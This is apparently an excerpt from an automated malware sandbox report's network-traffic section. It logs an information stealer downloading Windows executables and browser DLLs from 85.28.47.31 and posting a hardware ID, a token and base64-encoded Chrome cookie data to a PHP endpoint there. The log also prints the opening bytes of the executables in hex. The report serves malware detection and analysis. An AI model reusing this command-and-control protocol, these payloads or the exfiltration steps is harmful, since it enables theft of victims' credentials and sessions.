02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 68 65 64 6d 78 68 69 00 60 1a 00 00 00 32 00 00 5a 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 66 6c 76 67 72 66 64 00 10 00 00 00 60 4c 00 00 04 00 00 00 4c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4c 00 00 22 00 00 00 50 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Jul 2024 05:15:07 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Mon, 22 Jul 2024 02:01:04 GMTConnection: keep-aliveETag: "669dbd60-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 af 9d 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 7c 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 de ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Jul 2024 05:15:10 GMTContent-Type: application/octet-streamContent-Length: 214528Last-Modified: Wed, 24 Jul 2024 05:06:32 GMTConnection: keep-aliveETag: "66a08bd8-34600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9f 18 76 f1 db 79 18 a2 db 79 18 a2 db 79 18 a2 66 36 8e a2 da 79 18 a2 c5 2b 9c a2 c5 79 18 a2 c5 2b 8d a2 cb 79 18 a2 c5 2b 9b a2 b8 79 18 a2 fc bf 63 a2 dc 79 18 a2 db 79 19 a2 b3 79 18 a2 c5 2b 92 a2 da 79 18 a2 c5 2b 8c a2 da 79 18 a2 c5 2b 89 a2 da 79 18 a2 52 69 63 68 db 79 18 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 46 5b 9e 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 02 00 00 20 02 00 00 00 00 00 11 16 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 24 00 00 04 00 00 50 86 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 58 02 00 3c 00 00 00 00 c0 03 00 f0 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c 2f 02 00 00 10 00 00 00 30 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 06 20 00 00 00 40 02 00 00 22 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 22 01 00 00 70 02 00 00 1e 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6f 68 69 00 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 75 63 6f 77 00 04 00 00 00 b0 03 00 00 04 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 6b 20 00 00 c0 03 00 00 cc 00 00 00 7a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1721798339337Host: self.events.data.microsoft.comContent-Length: 7973Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBGDGCAAKJEBFIDBAAAHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 34 32 41 32 42 37 30 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 2d 2d 0d 0a Data Ascii: ------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="hwid"8A42A2B70D8C1730677652------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="build"sila------HCBGDGCAAKJEBFIDBAAA--
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="message"browsers------DBKEHDGDGHCBGCAKFIII--
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFHCBFHDHCAAKFHDGDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 2d 2d 0d 0a Data Ascii: ------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="message"plugins------EBAFHCBFHDHCAAKFHDGD--
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFBAECBAEGDGDHIEHIHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 2d 2d 0d 0a Data Ascii: ------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="message"fplugins------CBKFBAECBAEGDGDHIEHI--
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKHost: 85.28.47.31Content-Length: 7927Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFBAECBAEGDGDHIEHIHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 2d 2d 0d 0a Data Ascii: ------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEHIEBGHDAFIEBGIEHJHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 2d 2d 0d 0a Data Ascii: ------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="file"------BAEHIEBGHDAFIEBGIEHJ--
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEBFBFIEHIDAAAAFHCFHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 42 46 42 46 49 45 48 49 44 41 41 41 41 46 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 42 46 42 46 49 45 48 49 44 41 41 41 41 46 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 42 46 42 46 49 45 48 49 44 41 41 41 41 46 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 42 46 42 46 49 45 48 49 44 41 41 41 41 46 48 43 46 2d 2d 0d 0a Data Ascii: ------JKEBFBFIEHIDAAAAFHCFContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------JKEBFBFIEHIDAAAAFHCFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKEBFBFIEHIDAAAAFHCFContent-Disposition: form-data; name="file"------JKEBFBFIEHIDAAAAFHCF--
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDHost: 85.28.47.31Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 